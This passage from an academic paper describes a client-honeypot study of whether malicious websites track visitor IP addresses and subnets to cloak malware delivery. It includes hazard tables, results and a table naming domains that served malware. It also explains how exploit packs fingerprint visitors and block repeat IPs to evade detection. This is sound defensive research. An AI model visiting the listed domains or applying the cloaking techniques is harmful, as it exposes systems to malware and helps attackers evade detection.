- **Browser (Retrieval Agent)**: The capabilities of the visiting agent may have a significant effect on the number of triggered malware delivery. Many malicious websites employ techniques such as multiple redirections, browser and referer identification and patterns of retrieval to detect an automated agent from a genuine user. A malicious website may also place a cookie in a visitor's system to track subsequent visits and determine if the client has visited the page previously [20]. The browser module should therefore provide such capabilities or have measures in place to minimize their impact on the result of the experiment. Our experiments rely on a client honeypot capable of emulating personalities of browsers and handle high impact functionalities (e.g. redirection, cookies management and browser agent simulation). Moreover, components, functionalities and attributes of the client honeypot remain identical which ensures that their potential effect is observed and equivalent throughout the experiments. More malicious websites are classified than expected

- **Analysis Engine**: False negatives and variations in results could be the outcome of weak or varying detection engines. We attempt to minimize such threats by keeping detection engines constant for all analysis processes and employ multiple engines to reduce false negative. The number of false negatives in a client honeypot system should be determined by experiments in controlled environment as a large number of variables in URL selection and retrieval may impact the detection rate of the analysis system. For instance, if malicious website W1 is retrieved using two nodes N1, N2, varying attributes within the retrieval environment such as location of node N1 may expose it to malware while N2 is served with a benign content as it resides in a network which is blacklisted by the malicious website. Table 1 shows the HAZOP analysis of our client honeypot's detection module.

### 4.2. Stimuli

Stimuli refers to the process of making the request, modules and attributes involved. These include:

- Network Profile: Network profile refers to the information and association of a certain IP address or a range of IP addresses with a particular security or search engine organization (e.g. Google, McAfee). Blocking users from those IP addresses and network subnets is a feature found in several browser exploit packs [10,11]. In our experiment, IP addresses were selected from companies with low and no security related profile. Measures were also taken to ensure that both IP and network tracking experiments were done using different network profiles to minimize the possibility of raising suspicious behavior from a single network.
- Physical Location: Derived from the IP address, corresponds to a country, region, custom or current events and could be used to launch directed attack to maximize the success rate. A location in United States within a city region was selected. Users in United States represent high value targets and more likely to be the target of web-based attacks [21,22].
- Operating System: Browser exploit packs detect browser and operating system of visiting users and deliver exploits designed to exploits that particular operating system's vulnerabilities. Windows XP Service Pack 2 operating system was chosen as it still has a high user-base and includes a large number of vulnerabilities.
- HTTP Header: HTTP protocol's request header contains information about the client's preferred language, operating system, the requesting

**Table 1.** Hazards which could be introduced into a study by client honeypot's detection module, their consequences and actions to minimize their effects.

| Module | Keyword and deviations | Possible cause | Severity | Likelihood | Possible consequences | Actions to be taken |
|---|---|---|---|---|---|---|
| | | Attacks are zero-day exploits. No signatures are available for the attacks | | | Threat to external validity, May result in false negative | Create a broad signature or pattern. Add additional detection engines and update the existing database. Determine the false negative rate by manually running tests on a controlled set of malicious files |
| | *Less* number of websites is classified as malicious | Malicious JavaScript is obfuscated to avoid detection by signature based engines | 3 | 2 | Website is not detected as malicious resulting in false negative. Threat to internal validity | Perform de-obfuscation and de-minification of JavaScript files |
| Analysis engine | | Embedded files are larger than a size specified by user | | | | Specify a large size higher than average or likely size of online malwares |
| | | Malicious JavaScript is embedded within the pdf or document files | | | | Extract and de-obfuscate any hidden scripts within .pdf files |
| | *More* webpages are classified as malicious | Incorrect signature for an attack | 3 | 1 | Threat to external validity, May result in false positive | Determine the false positive rate by manually running tests on a large controlled set of benign files. Create rules which incorporates higher number signatures or a combinations of pattern to lower false positive |

application and character set which may be used in a targeted or cloaked attack. Some of these are Accept-Language, Accept-Charset, From, Via, User-Agent, X-Forwarded-For and Referer.

- Referer: Referer is an HTTP request header that identifies the location a client followed to reach the resources on the website. Referrer settings can significantly influence the number of attacks a user is subjected to as shown in studies on web spam and cross-side scripting attacks [23–28]. Google search result referer was selected based on our experiment on a large number of malicious websites which yielded significantly higher number of attacks compared to a null value referer.

- Language: Language settings on visiting user's operating system, user-agent header information in combination with IP address and subsequent geographical location information can subject a user to malware designed for a particular region [29].

- Time: The malicious website may go offline or its behavior change during the time it takes for two detection nodes to retrieve and perform analysis. Timing issues with IP-tracking detection systems should be minimized by retrieving contents from multiple nodes within a short period from one another. Other system or environmental threats such as manipulation of retrieval requests and unavailability of DNS services at a particular time are minimized through elimination of the threat (e.g. proxy) and redundancy, respectively. Moreover, threats

introduced by failure of a component during the experiment phase which may lead to time disparities between nodes are handled and minimized through reliability components of our client honeypot which are discussed in Section 4.6.

### 4.3. Subjects

Subject refers to the set of URLs retrieved and analyzed in the study. A webserver may fail to participate in the study due to availability of webserver or DNS services. Unavailability of remote content at a particular time can be mitigated through repeating the retrieval process at various stages and logging unsuccessful attempts. The process of selecting target URLs for retrieval may also pose a threat to the result external validity of the study. A data-set comprising of specific websites belonging to a single domain may exhibit a pattern that cannot be generalized to a larger population due to a specific domain attribute. Redundant services and processes within the design ensured minimize the risk of inaccurate analysis due to unavailability of resources. These redundancies include:

(1) Multiple DNS servers for address translation
(2) Logging and repeating the retrieval for URLs which return several address translation and client or server side errors such as:

- 105: Unable to resolve the host address (Temporary failure in name resolution)

**Table 2.** Lists the properties of the nodes and honeyclient's retriever module common in both IP and network tracking experiments.

| | Common attributes in both experiments |
|---|---|
| OS | Windows XP Service Pack 2 |
| Browser | Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) |
| Referrer | Google |
| Language – OS/Browser | en_US.UTF-8, en-us |

- 408 Request Time-Out
- 500 Internal Server Error
- 503 Service Temporarily Unavailable
- DNS Lookup Error (Name or service not known)

Figure 1 shows a high-level view of the experiment's setup including the configurations of the operating system and retrieval and analysis components of the client honeypot used in the IP and network tracking experiments. Several other attributes of the experiment's setup were also identical in both the IP and network tracking experiments (Table 2).

## 4.4. Input data-set

Selection of suspicious URL data-set for retrieval can influence the number and type of delivered attacks. For instance a malicious Russian website may only target users located within Russia or Russian speaking countries. These websites' contents are designed to lure specific users by serving appealing content in local language or other factors such as regional events as click baits. To maximize the external validity of the results, the input set of suspicious URLs were gathered from multiple sources including public database of suspicious domains (e.g. hpHosts [30]) and few top level domains associated with pirated software and warez. High external validity in an experiment warrants a high degree of certainty about the generalizability of the findings. Duplicate entries in URL data-set pose a risk to the detection accuracy since the website may deliver or redirect user to a benign website upon subsequent visit. We therefore implemented duplication removal prior to retrieval.

## 4.5. Client honeypot

Content retrieval and analysis was performed using Yalih low interaction client honeypot. A low interaction client honeypot is a detection system comprising of a lightweight simulator which mimics the behavior of a client browser and interacts with a remote website. The response is subsequently examined with the client honeypot's detection engine [31]. Yalih relies on a combination of multiple signature-based detection engines and pattern matching detection engine of Yara; a well-known and widely used library in malware detection engines and client honeypots [32].

Malicious code, including those for which a signature has been generated can be obfuscated using numerous techniques that programming languages such as JavaScript provide. A simple obfuscation using substitution could make the code undetectable by common signature-based detection engines. Overcome such shortcoming, Yalih attempts to de-obfuscate the embedded JavaScripts using the built-in de-obfuscator module which relies on Rhino JavaScript engine. The output script is then scanned using the multiple detection engines. Process of extraction and deobfuscation of embedded JavaScript code is also performed on .pdf files, using a popular pdf unpacker and analysis tool [33]. Similarly the output file is scanned using the signature and pattern matching detection engines of Yalih. Additional detection engines based on offline content can be added for further analysis. A high interaction client honeypot would rely on state changes for detection and require a proxy setup for local content storage and further analysis. Such a setup would fail to detect any attack for which the right environment is not present in terms of operating system, browser type and versions as the attack fails to execute. Our Low interaction client honeypot on the other hand identifies an attack through its signatures and patterns of malicious attributes. A high interaction client honeypot would also fail to detect time bombs or triggered based attacks [31–34].

Yalih allows the HTTP referer variable to be manually specified within its simulated browser which is based on the Mechanize Library [35]. The Mechanize simulated browser can be considered the most capable simulated browser in low interaction client honeypots and can handle server-side redirections, user-agent imitation, cookies, robots and server-side refresh. Its built-in crawler and robot.txt handling are specifically used in this study to illustrate crawling activity and trigger network monitoring by a website. Yalih is configured to extract embedded JavaScript codes from a website and attempt to de-obfuscate it using Rhino JavaScript engine [36].

The motivation behind utilization of a low interaction client honeypots in large studies is primarily due to their speed in retrieval and scanning. Retrieval and analysis of a single URL by a high interaction honeyclient may take several seconds to few minutes depending on the content of the website and available processing power [31–34]. A large data-set (e.g. One million websites) of input URLs will cause a significant delay

**Figure 1.** A high level view of the experiment's setup including the nodes, components of the client honeypot.

between each retrieval phase which consequently results in inaccurate analysis and lower number of detected malicious URLs due to offline websites for successive retrievals. A low interaction client honeypot's retrieval is however only limited by the experiment setup's bandwidth while its analysis module can perform detection in fraction of a second per URL (e.g. 0.167 seconds per URL for Yalih) [35].

There are also several low interaction client honeypots such as Thug [37] or PhoneyC [38] which were considered for the study. The performance of some honeyclients (e.g. PhoneyC, HoneyC [31]) were subpar in retrieval and detection capabilities while Thug which was in development during the design and development of Yalih, did not have the reliability for the retrieval of a large number of websites due to high rate of crash and low reliability.

Based on HAZOP study, we identified shortcomings within our client honeypot which could affect the number of detected websites. Retrieval and analysis phases of all nodes would be using identical client honeypot and system configuration and therefore, any hazard introduced through these phases would be evident in the results for all nodes. We compared our honeypot with a low interaction client honeypot with highest emulation capabilities to identify and compare its weaknesses, strengths and quantitatively measure the likelihood and severity of hazard (i.e. lower detection rate) from inferior browser emulation capabilities, which could be introduced through utilization of our in-house honeyclient. In terms of detection and analysis, Thug uses similar techniques

with Yalih for attack identification which include de-obfuscation of JavaScript and Yara pattern matching module. Additionally Thug honeyclient provides limited x86 environment emulation capability for shellcode detection through integration of Libemu library [39] and supports VirusTotal analysis [40]. Yalih, on the other hand provides extraction and de-obfuscation of JavaScripts from websites and associated pdf files and Yara's pattern matching capabilities. Yalih complements these by integrating two additional signature-based detection engines. Integration of VirusTotal was not deemed as a requirement since speedy offline analysis provided similar rate of detection. Table 3 summarizes and compares the capabilities of Yalih and Thug client honeypots. In order to justify utilization of Yalih in our experiments and also measure the hazards from lower browser emulation, we performed an experiment involving a set of 10,000 suspicious websites gathered from public malicious domain lists. The intent of the experiment was to determine if Thug's enhanced virtual browser would result in higher number of malware triggering and delivery. Thug's retriever is capable of imitating several flash, adobe and JavaScript vulnerability modules and can handle DOM events. These are retriever capabilities which are not implemented in Yalih. Yalih and Thug were installed on different machines on a network subnet with identical underlying operating system and configurations. The malware delivered to Thug and Yalih are compared in two different ways:

- **Category of malware**: Malware delivered to both instances of Yalih and Thug client honeypots exhibited identical type of malware for common websites.
- **Number of delivered malware**: Thug managed to detect 462 unique malicious websites compared to 455 for Yalih. Common malicious websites between Thug and Yalih also exhibited similar behavior in terms of type and number of components belonging to each unique website.

Overall insignificant variations were observed in the type and number of malicious components and websites. Such behavior and results could be due to the following reasons:

(1) Malicious websites did not trigger malware delivery for specific plugin versions and vulnerability modules activated in Thug.
(2) Malicious websites employed techniques to detect virtual environment in both client honeypots.
(3) Malicious websites served malware regardless of the client environment.

### 4.6. Reliability components

A client honeypot's retriever or analysis engine process may cease to operate normally due to several reasons such as programming error or the host operating system faults. Although it is assumed that the honeypot is monitored by an administrator on a regular basis, any delay in retrieval of a set of websites may introduce bias into an experiment and cause varying results and incorrect analysis. This issue is especially concerning in a distributed setup where multiple instances of the client are fetching content. A module has to monitor their operation and notify administrator should the process stop or fail. Yalih's monitor process monitors the operation of the client honeypot on predefined intervals set by the user. It utilizes psutil API and verify honeypots operation during retrieval and analysis phases. Psutil is a cross-platform and system utilities library for retrieving information on running processes and system utilization. During retrieval, monitor agent verifies the operation of client honeypot through:

(1) **Monitor running process** – It verifies if the process is running normally. It also checks if its PID has been reused by another process in which case returns False. It initially records the number of URLs and the current URL the honeypot is supposed to retrieve and checks the set periodically to assure the job is completed and the end of the set is reached. Should the retriever module hang or stop on a selected URL, monitor agent will restart the retrieval process from the last visited website and notifies the administrator through email.

(2) **Monitor bandwidth usage** – The retriever's process may be halted without being killed on a host operating system. The monitor agent detects such abnormality using the traffic monitoring function of psutil API. Should no connections (e.g. IPv4, TCP) be detected associated with retriever process on predefined intervals, monitor agent will restart the retrieval process from the last visited website and notifies the administrator through email accordingly.

During analysis, similarly, Yalih's process is monitored through process and CPU utilization on predefined intervals. Subsequent notification is sent to administrator and process is restarted should any errors be detected.

We concluded that the likelihood and severity of hazards introduced into the study through using Yalih was very insignificant since redundancy and repetition were embedded into the design which lowered the likelihood of threats such as offline remote services. Logging features also allowed for manual inspection of error to identify the failure of components or a process.

### 4.7. IP tracking setup

Content retrieval was performed using the following configurations: Three nodes located within a small geographical location (i.e. City). Geographically located nodes were a measure to ensure nodes would not be served varying content based on their location. Similar node configuration settings minimize the possibility of malware delivery based on attributes such as referrer, operating system or browser type and version (Table 4). Node-1 (IP1) in the experiment's setup initiates three retrievals to malicious websites:

(1) An initial connection to potentially register its IP address.
(2) A second retrieval in conjunction with IP2.
(3) Third retrieval in conjunction with nodes IP2 and IP3. The third retrieval is to examine the impact of multiple visits on malware delivery of malicious websites.

The twelve hours delay between retrievals was selected to minimize the risk of malicious websites going offline yet allow the IP addresses of visiting nodes to be registered with the websites for the next retrieval. Malicious websites utilizing fast flux networks for instance, have been observed to have an active life of few days and no more than 18.5 days [41,42]. The sequence of actions based on three nodes and multiple retrieval process of websites is depicted in Figure 2. Crawling behavior was avoided in IP tracking experiment to minimize the possibility of result contamination which may arise from

**Table 3.** Comparison between features and capabilities of YALIH and Thug.

| Components and capabilities | Client honeypot | |
|---|---|---|
| | Thug | Yalih |
| *Queuer* | | |
| Malicious database support | N | Y |
| Email/IMAP integration | N | Y |
| Search engine integration | N | Y |
| Bulk processing | N | Y |
| *Visitor* | | |
| Browser personality emulation, redirection, referer modification, robot.txt, refresh and cookies management and handling capabilities | Y | Y |
| Proxy support | Y | Y |
| Integrated crawler | Y | Y |
| DOM event handling | Y | N |
| Flash, Java and Pdf plugin and vulnerability emulation | Y | N |
| JavaScript and executable file extraction | Y | Y |
| Minification and feature extraction | N | Y |
| *Analysis* | | |
| JavaScript de-obfuscation | Y | Y |
| Integration of Yara malware detection library | Y | Y |
| Shellcode analysis | Y | N |
| Signature-based analysis | Online | Y |
| Signature generation | N | |
| Malicious pdf detection | Y | Y |
| Local analysis | Y | Y |
| Delayed execution | Y | N |
| *Management and reliability modules* | | |
| Job status notification | N | Y |
| Process monitoring and failure recovery | N | Y |

**Table 4.** Number of input URLs for retrieval and the network and locational properties of the retrieving nodes.

| | IP tracking experiment | | |
|---|---|---|---|
| URL data-set | 1,000,000 URLs | | |
| | | Nodes | |
| | IP1 | IP2 | IP3 |
| IP address | 107.161.157.*** | 199.48.68.*** | 155.94.216.*** |
| Network profile | VPS nodes | PaulVPS | Sshvm |
| Physical location | | Los Angeles, USA | |

a website's detection of crawling activity. Cookies were handled and stored for subsequent visits by our retriever component (i.e. Mechanize simulated browser and its built-in cookielib library [43]) to inform a website of previous visits.

### 4.8. Network tracking (NT) setup

In this experiment, similar to IP tracking, the idea was to determine if retrieval from nodes within the same subnet or adjacent IP addresses (e.g. 104.168.32.**2, 104.168.32.**3) would result in lower number of attacks for the node initiating the 2nd connection (Table 5). Several steps were taken to represent the behavior of initial retrieval by node NT1-a as a crawling activity:

- Crawling activity was enabled for NT1-a through removal of delay between the retrieval of input domain components (e.g. .exe files).
- Performing rapid retrieval of random links from the domain.

- Accessing and retrieving Robot.txt file to officially represent the node as a crawler.

These actions were performed to make the initial retrieval from the first node (i.e. NT1-a) suspicious to a website. This experiment only focused on analysis of malicious website behavior toward adjacent IP addresses suspected of being from the same website. The experiment did not include retrieval from high-profile security or research organizations.

In our experiment, similar number of malicious websites in NT1-a and NT1-b and lower number of malicious websites in NT2-c ? which is performed simultaneously with NT1-b ? would indicate network tracking by the website. Slight inconsistency is expected between NT1-a and NT1-b as the timing between their retrieval differs by six hours which may result in few websites being offline in the meantime. In the network tracking experiment, the delay was reduced to six hours to minimize the probability of offline websites. The experiment was performed on

INTERNATIONAL JOURNAL OF COMPUTERS AND APPLICATIONS 115



**Figure 2.** Retrieval process of our IP tracking experiment based on three nodes and three phases.

**Table 5.** Number of URLs used in the network tracking experiment and properties of the participating nodes.

| | Network tracking experiment | |
|---|---|---|
| URL data-set | 500,000 URLs | |
| | NT1 Subnet | NT2 Subnet |
| IP address | NT1-2 104.168.32.**2 NT1-3 104.168.32.**3 | N2-7 162.221.176.*7 |
| Network profile | OpenVirtuals | VPSAce |
| Physical location | New York, USA | |

a set of URL consisting of 500,000 suspicious domains. Figure 3 shows an overview of our experiment setup.

## 4.9. IP tracking experiment results

In our repeated measurement study, one million websites were retrieved using our low interaction client honeypot Yalih on three different nodes.

Initial retrieval by hosts show a near similar number of malicious websites fetched; IP1 = 4969, IP2 = 4961 and IP3 = 4959. The minor difference between initial retrieval by nodes could be associated with the time difference between retrievals which would result in some websites going offline (i.e. 24 h between all nodes). Malicious websites utilizing fast flux networks for instance, have been observed to have an active life of few days and no more than 18.5 days [41,42]. Table 6 shows the number of unique malicious websites fetched in retrieval by each node. The delay between each retrieval phase is 12 h. Second retrieval by nodes shows a relatively large drop in the number of unique malicious websites compared to the initial retrievals. Initial retrievals have an overall standard deviation of 5.29 (10 websites between retrieval 1 by IP1 and IP3) while the standard deviation between first, second and third retrievals is greater than 224 for IP1 (Tables 6 and 7).

**Table 6.** Number of malicious websites fetched in each phase by each node.

| Retrieval phase | Retrieval nodes (number of malicious websites) | | |
|---|---|---|---|
| | IP1 | IP2 | IP3 |
| Phases | (Phase1) 4969<br>(Phase2) 4867<br>(Phase3) 4539 | [12 hour delay]<br>(Phase1) 4961<br>(Phase2) 4863 | [12 hour delay]<br>[12 hour delay]<br>(Phase1) 4959 |



**Figure 3.** Retrieval process of our network tracking experiment.



**Figure 4.** Venn diagram showing the number of domains between three retrieval phases of node IP1.

The similarities between the numbers of detected malicious domains in phase1 of retrieval by all nodes and phase two by IP1 and IP2 illustrate the reliability of our study. It confirms that if hazards can be controlled and minimized in an experimental environment, the results should be consistent and can be replicated and predicted. Nodes participating in the study with similar attributes and controlled hazards -apart from IP address- resulting in large decrease in the number of detected attacks also support the internal validity of our experimental design where a direct relationship between number of visits and malware delivery behavior can be observed. Neglecting to control nodes' other attributes or experimental variables could introduce significant hazard into the study. For instance, in this study, all nodes' referer settings were set to Google's search query to represent a user who visits the website from Google's result page. If the referer setting of IP1's retrieval phase1 were to change to blank/null and retrieval phase2 to Google's referrer setting, it would result in significantly higher detected attacks in phase2. Google's referrer has been confirmed by studies to mimic a regular user more accurately and result in higher number of attacks [23–26].

Overall, 4969 unique malicious websites were detected in phase 1 retrieval by IP1. Initial retrieval by other nodes (i.e. IP2 and IP3) also resulted in very similar number of detected domains (i.e. 4961 and 4959) despite 24 h total delay. Second retrieval phases by IP1 and IP2 nodes followed similar pattern of comparable number of detected domains (i.e. 4867 and 4863). Evidence of IP tracking behavior can be observed in subsequent retrievals by nodes IP1 and IP2. Retrieval phase2 and phase3 by node IP1 and phase2 by node IP2 for instance results in relatively much lower number of detected domains. The results illustrate that in our data-set, malicious do-

INTERNATIONAL JOURNAL OF COMPUTERS AND APPLICATIONS   117

**Table 7.** Statistics on IP1 and IP2 data-sets.

| | Descriptive statistics | | | | | | |
|---|---|---|---|---|---|---|---|
| | N | Min | Max | Mean | | Std. Dev. | Variance |
| | Stat. (Statistics) | Stat. | Stat. | Stat. | Std. Error | Stat. | Stat. |
| IP1 | 3 | 4539 | 4969 | 4791.6 | 129.71 | 224.6 | 50,481 |
| IP2 | 2 | 4863 | 4961 | 4912.0 | 49.000 | 69.29 | 4802.0 |

**Table 8.** Number of common and unique malicious domains for each retrieval phase (IP1 and IP2).

| | IP1 | | | |
|---|---|---|---|---|
| Retrieval phases | Common domains between all | 1st retrieval only* | 2nd retrieval only | 3rd retrieval only |
| 1,2,3 | 4068 | 270 | 130 | 23 |

| | IP2 | | |
|---|---|---|---|
| Retrieval phases | Common domains | 1st retrieval only | 2nd retrieval only |
| 1,2 | 4515 | 446 | 348 (2nd) |

mains were more likely to served malicious content to nodes with no history of prior interaction [44]. 4068 domains were shared between phase1, phase2 and phase3 retrievals of node IP1. A large set of domains (i.e. 270) only delivered malicious code during retrieval phase1 while 130 domains triggered malware delivery only in phase2 of retrieval. Phase3 resulted in only 23 unique websites being detected. The decline in the succeeding retrieval by nodes in Table 8 and Figure 4 illustrate that subsequent visits also trigger IP tracking and cloaking behavior; however many websites rely on initial visit for malware delivery. These results are in line with the design of many browser exploit packs which prevent access to landing pages if repeated access and retrieval is observed. Styx browser exploit pack for instance has an embedded API called '/api/setBlockRepeatForIP' which blocks malware delivery for repeating IPs [45]. A large number of malicious websites served identical type of malicious content not only for different retrieval phases of a single node but also between different nodes. For instance, in Table 6, initial retrieval by IP1 and IP2 resulted in 4417 common malicious domains being detected. From which only 18 domains served varying malicious content (i.e. type of malicious code: malicious iframe, shell-code etc.). Domains serving varying malicious content for different nodes were a small subset of overall detected malicious domains (e.g. 25/4457 and 26/4354 for phase1 retrieval of IP1- IP3 and IP2-IP3 respectively) (Table 9). There are two possibilities for such behavior: (1) These domains directed users to their own specific Exploit Server which served a single exploit for all visitors or, (2) Our client honeypots managed to emulate regular users effectively and had consistency in their emulation across all three nodes which triggered identical malware delivery. We believe the latter assumption is valid since various at-

**Table 9.** Number of common malicious domains between retrieval phases and those serving varying content upon consecutive visits.

| Node | Retrieval phase | Common domains | Websites serving exact malicious content/varying content |
|---|---|---|---|
| IP1-IP2 | 1 | 4417 | 4399/18 |
| IP1-IP3 | 1 | 4482 | 4457/25 |
| IP2-IP3 | 1 | 4380 | 4354/26 |
| IP1-IP2 | 2 | 4291 | 4273/18 |
| IP1 | 1-2 | 4486 | 4459/27 |

**Table 10.** Number of detected domains in network tracking experiment.

| | Network tracking data-set | |
|---|---|---|
| | NT1 | NT2 |
| Unique domains/components, NT1-2 | 1041/1428 | – |
| Unique domains/components, NT1-3 | 1037/1421 | 1029/1423 |
| Common domains between NT1-2/ NT1-3 | 1011 | |
| Common domains between all | 985 | |
| Common component between all | 1352 | |

tributes of a visitor browser and system are analyzed by the landing page before redirecting to an exploit server which delivers a specific malware for a visitor's system configuration. Landing pages are gateways which redirect users or point a browser to page which hosts the final malicious content. The site with the final malware is called the Exploit Server [12].

An exploit pack's attack process starts with its fingerprint module which is responsible for determining the attributes of a visiting user's system and browser information. These variables are related to the browser, browser version, operating system, browser plugins and any configurable policies the administrator of the toolkit has defined. The fingerprint component may rely on

**Table 11.** Variation in the behavior of malicious websites between two retrieving nodes in network N1.

| Website | NT1-2 | NT1-3 |
|---|---|---|
| eiqikan.com | JavaScript JS.Agent-156 | timed out |
| eastfilm.net | Exploit.iframe-1 | timed out |
| **eimiao.com.cn | HTML.iframe-63 | timed out |
| ***productions.com | JS.Trojan.Blackhole-1 | timed out |
| ***syncrvprodist.com | AdLoad.K / Adware Generic5.BNDB | timed out |
| **enode.net | Exploit.MS05-013 | timed out |
| **ntushi.cn | JavaScript JS.Agent-156 | timed out |
| ***bers.on.nimp.org | Exploit.MS05-013 | timed out |
| ***ngstudio935.com | HTML/Framer | Forbidden |
| yz-sl.cn | VBS.Agent-62 | timed out |
| thedeadpit.com | HTML/Framer | Redirection |
| down.hit020.com | Win.Trojan.11350378 | Forbidden |
| ***rformancescan.nl | JS/Redirector | timed out |
| china-zhenao.com | VBS/Dropper | timed out |
| dtstesting.com | JS/Exploit | timed out |
| web1.51.la | JavaScript JS/Agent | Connection reset by peer |



**Figure 5.** General process of target selection and exploitation in browser exploit packs.

redirections for variable extraction and redirecting to the appropriate landing site. The redirections are the gateways that point the malware distribution site and do not generally host the exploit payload themselves (Figure 5).

### 4.10. Network tracking experiment results

Retrievals between network NT1-a, NT1-b and node NT2-c in the different network indicate a minor difference which could potentially be due to timing of the retrieval (i.e. 6 h). Retrieval from network NT1-b which had a similar IP address in the same subnet, however resulted in slight difference in the number of unique domains and embedded components compared to the initial retrievals from NT1-a and NT2-c. This shows that within our experiment and data-set containing more than 500,000 unique malicious domains, network tracking was employed by a very small subset of the domains. This is significantly less than deviation observed in IP tracking. A reason behind such a result could be due to the fact that tracking or blocking a subnet may result in blocking a large subset of IP addresses which would subsequently result in less number of potential infected hosts. We therefore assume that while network tracking for high-profile networks (e.g. Google, Microsoft and Symantec Security) is widely used, implementation of network tracking based on onetime suspicious behavior from a node is not commonly used. Table 10 shows a summary of detected attacks in our experiment of network tracking performed on 500,000 URL data-set. The number of unique domains and components is very similar in all

INTERNATIONAL JOURNAL OF COMPUTERS AND APPLICATIONS  119

phases of the experiment; however there are differences in actual domain names in common and their behavior. Thirty (i.e. 1041-1011) malicious domains were unique to NT1-a only, of which few examples of the difference in their behaviors compared to NT1-b is listed in Table 11. Similarly 26 unique domains unique to NT1-b mostly resulted in connection timeout messages on NT1-a while serving malicious components to NT1-b. Similar behavior was observed between all retrieval nodes and phases. 1352 malicious components were detected between three nodes participating in the experiment (i.e. NT1-a, NT1-b and NT2-c). 1036 of 1352 components delivered identical type of malware (e.g. executable file, malicious iframe etc.).

Based on our understanding from our measurement experiment we believe simple network tracking for an average user may not pose a threat or vary considerably. Simple network tracking implies a tracking activity to identify associated hosts belonging to a specific network which might host a detection engine. The key findings of this research are:

(1) We demonstrated that malicious websites use IP tracking to monitor and track the retrieval pattern of clients and deliver malware accordingly.
(2) The IP and network tracking are very effective countermeasures against detection engines any detection engine. A malicious website can bypass detection regardless of the detection technique being used by the retrieving sensor. Systems such as [46] which rely on multiple execution of embedded code to trigger the attacks will also be impractical as benign content is delivered on first or subsequent visits, depending on the specified rule by the attacker. Widespread implementation of IP tracking feature in browser exploit packs is therefore due to simplicity in concept and implementation which makes this technique an ideal form of mitigation.
(3) Our results indicate that IP tracking was used by a large portion of websites. Ignoring the effects of IP tracking in the design of security experiments can therefore introduce error into the experiment results and lead to significant bias, variations and flawed analysis. Researchers studying the behavior of malwares therefore need to either take such bias into account in the final analysis or take steps to mitigate or minimize its effects.
(4) Our network tracking experiment also illustrate that network tracking features and specifically those embedded within the browser exploit packs are designed to filter traffic based on pre-defined network information of users and no indication

of subnet estimation and cloaking, regardless of adjacency or crawler activity of a single IP address was observed. We therefore conclude that placing retrieval nodes within the same network subnet does not result in tracking and cloaking and has very limited to no effect on the behavior of malicious websites. This finding can have major value to researchers and low-profile security organizations with require multiple retrievals but have limited access to resources in terms of IP allocations.

## 5. Conclusion and future work

Tracking IP address and network subnets is a technique used by websites to deliver malicious content to specific users based on their profile or visiting behavior and minimize detection in the process. In this paper, a study of malicious website behavior was performed using a real world experiment. Our experiment on one million suspicious websites gathered from multiple domains and sources reveal that malware delivery based on IP tracking is used in a small subset of malicious websites. The experiment on network tracking for similar and adjacent IP addresses however did not show any indication of tracking.

HAZOP approach was applied to the design of our repeated measurement experiments and various components and processes which could introduce threats into the study were removed (e.g. web proxy) or minimized through redundancy and consistency (e.g. offline webserver and location, respectively).

This experiment was performed using VPS services from low-profile companies who are not engaged in security related activities. To accurately measure the behavior of malicious websites, an experiment to compare the behavior between hosts located at a low-profile subnet with a host belonging to a large recognized organization (i.e. McAfee, Google) should be conducted. This paper can be a part of a larger study and future work could focus on applying the same methodology to a significantly larger set of visiting URLs. The URLS could be collected randomly from various domains to represent IP tracking behavior of malicious website across the Internet. Similar approach may also be applied to determine the effect of other attributes such as language and referrer tracking on delivery of malicious content.

## Disclosure statement

No potential conflict of interest was reported by the authors.

## ORCID

*Masood Mansoori* http://orcid.org/0000-0002-6412-2053
*Kim-Kwang Raymond Choo* http://orcid.org/0000-0001-9208-5336
*Roy A. Maxion* http://orcid.org/0000-0002-2833-7276

## Notes on contributors

*Masood Mansoori* is a PhD candidate from Victoria University of Wellington (VUW). His research focuses on intrusion detection and deception systems specifically server and client honeypots. He is an active member of Software Defined Networking (SDN) research group at VUW and is currently a lecturer of computer science at Wellington Institute of Technology (Weltec).

*Ian Welch* received his PhD degree in computer science from the University of Newcastle upon Tyne in 2004. He is an associate professor at Victoria University of Wellington and teaches cybersecurity and computer networking courses. His research interests include dependable systems, software-defined networking, intrusion detection, and human factors in computer security.

*Kim-Kwang Raymond Choo* received a PhD degree in Information Technology from Queensland University of Technology, Australia. His research interests include cybersecurity and digital forensics. He currently holds the Cloud Technology Endowed Professorship at The University of Texas at San Antonio, USA. He is a fellow of the Australian Computer Society and a senior member of IEEE.

*Roy Maxion* has a PhD degree in cognitive science from the University of Colorado in 1985. He is a research professor at the School of Computer Science at Carnegie Mellon University. His research covers several areas of computer science, including development and evaluation of highly reliable systems, concept learning, and human-computer interfaces. He is developing dependable systems for automated detection, diagnosis, and remediation of faulty or unanticipated events in many domains - international banking, telecommunications networks, digital libraries, vendor help systems, semiconductor fabrication, and others.

*Seyed Ebrahim Hashemi* is a software engineering lecturer at the department of computer engineering, Larestan University. His research interests are software safety, security, and privacy.

*Yuichi Hirose* received a PhD in Statistics from the University of Auckland. He is a lecturer at the School of Mathematics and Statistics at Victoria university of Wellington. His main research interests are application of profile likelihood estimation in semi-parametric models, missing data in semi-parametric models, information criteria and model selection, EM algorithm, and variational Bayesian methods.

## References

[1] Maxmind. Maxmind: Industry leading IP intelligence and open source IP address to location database provider; 2002.

[2] O'Dea H. The modern rogue – malware with a face. In: Proceedings of the Virus Bulletin Conference. Geneva, Switzerland; 2009.

[3] Erete I, Yegneswaran V, Porras P. Alice@ home: distributed framework for detecting malicious sites. In: Kirda E, Jha S, Balzarotti D, editors. Recent advances in intrusion detection; Lecture Notes in Computer Science. Berlin: Springer; 2009. p. 362–364.

[4] Stringhini G, Kruegel C, Vigna G. Shady paths: leveraging surfing crowds to detect malicious web pages. In: Proceedings of the 2013 ACM SIGSAC Conference on Computer & Communications Security. Berlin, Germany: ACM; Nov 4–8, 2013. p. 133–144.

[5] Antonatos S, Anagnostakis K, Markatos E. Honey@ home: a new approach to large-scale threat monitoring. In: Proceedings of the 2007 ACM Workshop on Recurring Malcode. Alexandria (VA): ACM; Oct 29 – Nov 02, 2007. p. 38–45.

[6] Wang Y-M, Beck D, Jiang X, et al. Automated web patrol with strider honeymonkey. In: Proceedings of the Network and Distributed System Security Symposium. San Diego, CA; 2006. p. 35–49.

[7] Rajab M, Ballard L, Jagpal N, et al. Trends in circumventing web-malware detection; 2011. (Report).

